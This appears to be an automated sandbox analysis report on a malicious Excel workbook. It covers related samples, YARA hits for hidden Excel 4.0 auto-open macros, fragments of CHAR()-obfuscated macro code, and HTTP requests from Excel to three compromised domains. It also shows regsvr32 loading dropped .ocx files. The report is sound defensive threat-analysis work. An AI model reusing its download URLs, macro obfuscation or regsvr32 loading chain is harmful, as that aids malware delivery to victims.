                                  Swift Copy TT.docGet hashmaliciousBrowse
                                  • 50.116.86.94
                                  8M5ZqXSa28.exeGet hashmaliciousBrowse
                                  • 192.185.129.44
                                  Change Order - Draw #3 .htmGet hashmaliciousBrowse
                                  • 162.214.66.227
                                  new-1834138397.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  new-1834138397.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  new-1179494065.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  Hsbc swift.exeGet hashmaliciousBrowse
                                  • 192.232.249.14
                                  new-1179494065.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  microcomputer Official Order.exeGet hashmaliciousBrowse
                                  • 192.185.84.191
                                  Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                                  • 70.40.220.123
                                  t 2021.HtMLGet hashmaliciousBrowse
                                  • 192.185.129.43
                                  New Order778880.exeGet hashmaliciousBrowse
                                  • 192.185.167.112
                                  IyRUJT27dd.exeGet hashmaliciousBrowse
                                  • 192.185.113.96
                                  LlDlHiVEJQ.exeGet hashmaliciousBrowse
                                  • 162.241.24.173
                                  bomba.armGet hashmaliciousBrowse
                                  • 162.144.165.114
                                  PAYMENT COPY FOR YOUR INFORMATION $76,956.exeGet hashmaliciousBrowse
                                  • 192.185.129.69
                                  Balance.xlsGet hashmaliciousBrowse
                                  • 192.185.113.96
                                  EDYMAN ORDER.vbsGet hashmaliciousBrowse
                                  • 162.241.148.206
                                  UNIFIEDLAYER-AS-1USQUOTATION REQUEST DOCUMENTS - GOTO TRADING.exeGet hashmaliciousBrowse
                                  • 162.240.9.164
                                  SecuriteInfo.com.VHO.Trojan-PSW.MSIL.Stealer.gen.30557.exeGet hashmaliciousBrowse
                                  • 192.185.84.191
                                  Swift Copy TT.docGet hashmaliciousBrowse
                                  • 50.116.86.94
                                  8M5ZqXSa28.exeGet hashmaliciousBrowse
                                  • 192.185.129.44
                                  Change Order - Draw #3 .htmGet hashmaliciousBrowse
                                  • 162.214.66.227
                                  new-1834138397.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  new-1834138397.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  new-1179494065.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  Hsbc swift.exeGet hashmaliciousBrowse
                                  • 192.232.249.14
                                  new-1179494065.xlsGet hashmaliciousBrowse
                                  • 108.179.253.213
                                  microcomputer Official Order.exeGet hashmaliciousBrowse
                                  • 192.185.84.191
                                  Arrival Notice, CIA Awb Inv Form.pdf.exeGet hashmaliciousBrowse
                                  • 70.40.220.123
                                  t 2021.HtMLGet hashmaliciousBrowse
                                  • 192.185.129.43
                                  New Order778880.exeGet hashmaliciousBrowse
                                  • 192.185.167.112
                                  IyRUJT27dd.exeGet hashmaliciousBrowse
                                  • 192.185.113.96
                                  LlDlHiVEJQ.exeGet hashmaliciousBrowse
                                  • 162.241.24.173
                                  bomba.armGet hashmaliciousBrowse
                                  • 162.144.165.114
                                  PAYMENT COPY FOR YOUR INFORMATION $76,956.exeGet hashmaliciousBrowse
                                  • 192.185.129.69
                                  Balance.xlsGet hashmaliciousBrowse
                                  • 192.185.113.96
                                  EDYMAN ORDER.vbsGet hashmaliciousBrowse
                                  • 162.241.148.206

                                  JA3 Fingerprints

                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  7dcce5b76c8b17472d024758970a406b6docs'pdf.ppamGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  PO201808143_330542IMG_20200710_0008.rtfGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  Order Contract_signed (4NQ39NGAY0GD).ppamGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  new-1834138397.xlsGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  new-1179494065.xlsGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  TT-PRIME USD242,357,59.ppamGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  TT-PRIME USD242,357,59.ppamGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  chase.xlsGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  private-1915056036.xlsGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  private-1910485378.xlsGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  INVOICE - FIRST 2 CONTAINERS 1110.docxGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  SWIFT-MT-103.docxGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  Balance.xlsGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  original shipping documents.ppamGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  INVOICE - FIRST 2 CONTAINERS 1110.docxGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  PO 16860.ppamGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  PI-#U00dcRN.Z#U00dcCC.LTD #U015eT.docxGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  Clti.xlsxGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  Vernon.xlsxGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2
                                  new order.docxGet hashmaliciousBrowse
                                  • 192.185.129.7
                                  • 103.247.11.218
                                  • 192.185.79.2

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Temp\A5B1.tmp
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Composite Document File V2 Document, Cannot read section info
                                  Category:dropped
                                  Size (bytes):1536
                                  Entropy (8bit):1.1464700112623651
                                  Encrypted:false
                                  SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                  MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                  SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                  SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                  SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\AppData\Local\Temp\~DF6B851E0CDFC5B426.TMP
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):28672
                                  Entropy (8bit):3.309727213192086
                                  Encrypted:false
                                  SSDEEP:768:5kmKpb8rGYrMPe3q7Q0XV5xtezEs/68/dgAWuImuZA:5TKpb8rGYrMPe3q7Q0XV5xtezEsi8/d1
                                  MD5:321156BB89EBDBE9CAEC80FB2A150C47
                                  SHA1:075C7AF142F023726A0A6246AF33B934C30DB540
                                  SHA-256:CB714098CBB73CAB579390D9EF687D1B260B30A6303C4BAFB77D8DBCB0E8BC4E
                                  SHA-512:CA544DDA2062EFB3FE75D55EF85288C989F323BC2935C2574EE3C0CD0C6F10045334A71A99FB723E62949B15B95FDDCA041DC025745C0A13111A5D93DF8620D0
                                  Malicious:false
                                  Reputation:low
                                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\AppData\Local\Temp\~DFC61FD91824AB246B.TMP
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):512
                                  Entropy (8bit):0.0
                                  Encrypted:false
                                  SSDEEP:3::
                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                  Malicious:false
                                  Reputation:high, very likely benign file
                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\Desktop\survey-1378794827.xls
                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Thu Nov 25 10:07:14 2021, Security: 0
                                  Category:dropped
                                  Size (bytes):252928
                                  Entropy (8bit):7.241408030327115
                                  Encrypted:false
                                  SSDEEP:6144:MKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgBcfFw6lxFT7kFWqOSMQ6HujLmH98DU1:kFrlxFTMrvbiFd8Dc
                                  MD5:F1BEF76841BECEE221944D0C436BE0E5
                                  SHA1:9C37635EECCBA5F2D2088F4600D17013A9B38879
                                  SHA-256:8B0F987444368354AB0A9BE324FE8EFB3E700CCE52F8F059D78F63196D0601BA
                                  SHA-512:DF2A7C551780D074DD84E9A68FD0B41A6C909C3577CC628BA7FFCACD1E42A0CFE911EB0765962D9DD2597EB90226C908A505CC74834698A18EB1C40DAA98C85A
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\survey-1378794827.xls, Author: John Lambert @JohnLaTwC
                                  • Rule: JoeSecurity_HiddenMacro, Description: Yara detected hidden Macro 4.0 in Excel, Source: C:\Users\user\Desktop\survey-1378794827.xls, Author: Joe Security
                                  Reputation:low
                                  Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user.8.=. B.....a.........=...................................................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.

                                  Static File Info

                                  General

                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Thu Nov 25 10:07:14 2021, Security: 0
                                  Entropy (8bit):7.241391186014771
                                  TrID:
                                  • Microsoft Excel sheet (30009/1) 78.94%
                                  • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                  File name:survey-1378794827.xls
                                  File size:252928
                                  MD5:7858cdbf85a5751a0853620c8908df14
                                  SHA1:8200d0104d40b68f9e523a1331dd77a8d36a827f
                                  SHA256:37ec1209daa15ba2bb2a9d9c372960703125e0b0acfa0736cb2ae10edfad7d62
                                  SHA512:4d98475950db17d064586704b0e28202a8d46d7cd6ae824e1de0941a0e6076e6e2f9ae3dc8a5cba30244fe05c31d77225ff0c4ab248b68e351fe2043af7626ab
                                  SSDEEP:6144:MKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgBcfFw6lxFT7kFWqOSMQ6HujLmH98DUm:kFrlxFTMrvbiFd8DH
                                  File Content Preview:........................>......................................................................................................................................................................................................................................

                                  File Icon

                                  Icon Hash:e4eea286a4b4bcb4

                                  Static OLE Info

                                  General

                                  Document Type:OLE
                                  Number of OLE Files:1

                                  OLE File "survey-1378794827.xls"

                                  Indicators

                                  Has Summary Info:True
                                  Application Name:Microsoft Excel
                                  Encrypted Document:False
                                  Contains Word Document Stream:False
                                  Contains Workbook/Book Stream:True
                                  Contains PowerPoint Document Stream:False
                                  Contains Visio Document Stream:False
                                  Contains ObjectPool Stream:
                                  Flash Objects Count:
                                  Contains VBA Macros:True

                                  Summary

                                  Code Page:1251
                                  Author:
                                  Last Saved By:
                                  Create Time:2015-06-05 18:19:34
                                  Last Saved Time:2021-11-25 10:07:14
                                  Creating Application:Microsoft Excel
                                  Security:0

                                  Document Summary

                                  Document Code Page:1251
                                  Thumbnail Scaling Desired:False
                                  Company:
                                  Contains Dirty Links:False
                                  Shared Document:False
                                  Changed Hyperlinks:False
                                  Application Version:1048576

                                  Streams

                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                  General
                                  Stream Path:\x5DocumentSummaryInformation
                                  File Type:data
                                  Stream Size:4096
                                  Entropy:0.490967081883
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . \\ . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S i m b 1 . . . . . S h e e t . . . . . S b u r r 8 . . . . . S b u u r 2 . . . . . R g e d w g . . . . . E O R
                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 5c 01 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 1a 01 00 00
                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                  General
                                  Stream Path:\x5SummaryInformation
                                  File Type:data
                                  Stream Size:4096
                                  Entropy:0.27571260507
                                  Base64 Encoded:False
                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ? R , . . . . @ . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 241509
                                  General
                                  Stream Path:Workbook
                                  File Type:Applesoft BASIC program data, first line number 16
                                  Stream Size:241509
                                  Entropy:7.42266783191
                                  Base64 Encoded:True
                                  Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . . . 4 . < . 8 . = . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . .
                                  Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 01 10 04 34 04 3c 04 38 04 3d 04 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                  Macro 4.0 Code

                                  12,2,=CHAR(Simb1!D25)
                                  
                                  6,7,=CHAR(Simb1!J25)
                                  
                                  10,5,=CHAR(Simb1!R27)
                                  
                                  6,3,=CHAR(Simb1!S32)
                                  
                                  11,2,=CHAR(Simb1!E31)
                                  
                                  4,5,=CHAR(Simb1!G26)
                                  

                                  Network Behavior

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 25, 2021 14:26:44.427889109 CET49165443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:26:44.427944899 CET44349165192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:26:44.428015947 CET49165443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:26:44.438564062 CET49165443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:26:44.438596010 CET44349165192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:26:44.734230995 CET44349165192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:26:44.734426975 CET49165443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:26:44.748606920 CET49165443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:26:44.748645067 CET44349165192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:26:44.749151945 CET44349165192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:26:44.749257088 CET49165443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:26:44.982146978 CET49165443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:26:45.024884939 CET44349165192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:26:46.221467018 CET44349165192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:26:46.221635103 CET49165443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:26:46.221985102 CET44349165192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:26:46.222049952 CET49165443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:26:46.222049952 CET44349165192.185.79.2192.168.2.22
                                  Nov 25, 2021 14:26:46.222091913 CET49165443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:26:46.268558979 CET49166443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:26:46.268594980 CET44349166192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:26:46.268657923 CET49166443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:26:46.269254923 CET49166443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:26:46.269267082 CET44349166192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:26:46.568352938 CET44349166192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:26:46.568511963 CET49166443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:26:46.581381083 CET49166443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:26:46.581402063 CET44349166192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:26:46.581700087 CET44349166192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:26:46.581758022 CET49166443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:26:46.598054886 CET49166443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:26:46.640871048 CET44349166192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:26:46.869261980 CET44349166192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:26:46.869345903 CET49166443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:26:46.869379044 CET44349166192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:26:46.869404078 CET44349166192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:26:46.869435072 CET49166443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:26:46.869450092 CET49166443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:26:46.869550943 CET49166443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:26:46.869570017 CET44349166192.185.129.7192.168.2.22
                                  Nov 25, 2021 14:26:46.869585991 CET49166443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:26:46.869609118 CET49166443192.168.2.22192.185.129.7
                                  Nov 25, 2021 14:26:47.021784067 CET49167443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:26:47.021836996 CET44349167103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:26:47.021909952 CET49167443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:26:47.022588968 CET49167443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:26:47.022603989 CET44349167103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:26:47.672051907 CET44349167103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:26:47.672251940 CET49167443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:26:47.686055899 CET49167443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:26:47.686091900 CET44349167103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:26:47.686393976 CET44349167103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:26:47.686475039 CET49167443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:26:47.690493107 CET49167443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:26:47.736875057 CET44349167103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:26:49.844567060 CET44349167103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:26:49.844643116 CET44349167103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:26:49.844774008 CET49167443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:26:49.844924927 CET49167443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:26:49.844949961 CET44349167103.247.11.218192.168.2.22
                                  Nov 25, 2021 14:26:49.844969988 CET49167443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:26:49.845027924 CET49167443192.168.2.22103.247.11.218
                                  Nov 25, 2021 14:28:44.543679953 CET49165443192.168.2.22192.185.79.2
                                  Nov 25, 2021 14:28:44.543730021 CET49165443192.168.2.22192.185.79.2

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Nov 25, 2021 14:26:44.261925936 CET5216753192.168.2.228.8.8.8
                                  Nov 25, 2021 14:26:44.414885044 CET53521678.8.8.8192.168.2.22
                                  Nov 25, 2021 14:26:46.245194912 CET5059153192.168.2.228.8.8.8
                                  Nov 25, 2021 14:26:46.266122103 CET53505918.8.8.8192.168.2.22
                                  Nov 25, 2021 14:26:46.887814999 CET5780553192.168.2.228.8.8.8
                                  Nov 25, 2021 14:26:47.019310951 CET53578058.8.8.8192.168.2.22

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                  Nov 25, 2021 14:26:44.261925936 CET192.168.2.228.8.8.80xdcafStandard query (0)klevvrtech.comA (IP address)IN (0x0001)
                                  Nov 25, 2021 14:26:46.245194912 CET192.168.2.228.8.8.80x4801Standard query (0)srkcampus.orgA (IP address)IN (0x0001)
                                  Nov 25, 2021 14:26:46.887814999 CET192.168.2.228.8.8.80x8c3dStandard query (0)rstebet.co.idA (IP address)IN (0x0001)

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                  Nov 25, 2021 14:26:44.414885044 CET8.8.8.8192.168.2.220xdcafNo error (0)klevvrtech.com192.185.79.2A (IP address)IN (0x0001)
                                  Nov 25, 2021 14:26:46.266122103 CET8.8.8.8192.168.2.220x4801No error (0)srkcampus.org192.185.129.7A (IP address)IN (0x0001)
                                  Nov 25, 2021 14:26:47.019310951 CET8.8.8.8192.168.2.220x8c3dNo error (0)rstebet.co.id103.247.11.218A (IP address)IN (0x0001)

                                  HTTP Request Dependency Graph

                                  • klevvrtech.com
                                  • srkcampus.org
                                  • rstebet.co.id

                                  HTTPS Proxied Packets

                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  0192.168.2.2249165192.185.79.2443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  TimestampkBytes transferredDirectionData
                                  2021-11-25 13:26:44 UTC0OUTGET /zxywJAC24KJ/ji.html HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: klevvrtech.com
                                  Connection: Keep-Alive
                                  2021-11-25 13:26:46 UTC0INHTTP/1.1 200 OK
                                  Date: Thu, 25 Nov 2021 13:26:45 GMT
                                  Server: Apache
                                  Upgrade: h2,h2c
                                  Connection: Upgrade, close
                                  Accept-Ranges: none
                                  Content-Length: 0
                                  Content-Type: text/html; charset=UTF-8


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  1192.168.2.2249166192.185.129.7443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  TimestampkBytes transferredDirectionData
                                  2021-11-25 13:26:46 UTC0OUTGET /OYcMRJbL/ji.html HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: srkcampus.org
                                  Connection: Keep-Alive
                                  2021-11-25 13:26:46 UTC0INHTTP/1.1 200 OK
                                  Date: Thu, 25 Nov 2021 13:26:46 GMT
                                  Server: nginx/1.19.10
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 0
                                  X-Server-Cache: true
                                  X-Proxy-Cache: HIT
                                  Connection: close


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  2192.168.2.2249167103.247.11.218443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  TimestampkBytes transferredDirectionData
                                  2021-11-25 13:26:47 UTC1OUTGET /fbmKk6n48G/ji.html HTTP/1.1
                                  Accept: */*
                                  UA-CPU: AMD64
                                  Accept-Encoding: gzip, deflate
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                  Host: rstebet.co.id
                                  Connection: Keep-Alive
                                  2021-11-25 13:26:49 UTC1INHTTP/1.1 200 OK
                                  Connection: close
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 0
                                  Date: Thu, 25 Nov 2021 13:26:49 GMT
                                  Server: LiteSpeed
                                  Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000


                                  Code Manipulations

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Start time:14:26:20
                                  Start date:25/11/2021
                                  Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                  Imagebase:0x13f470000
                                  File size:28253536 bytes
                                  MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:14:26:31
                                  Start date:25/11/2021
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
                                  Imagebase:0xff9d0000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

                                  General

                                  Start time:14:26:31
                                  Start date:25/11/2021
                                  Path:C:\Windows\System32\regsvr32.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
                                  Imagebase:0xff9d0000
                                  File size:19456 bytes
                                  MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high

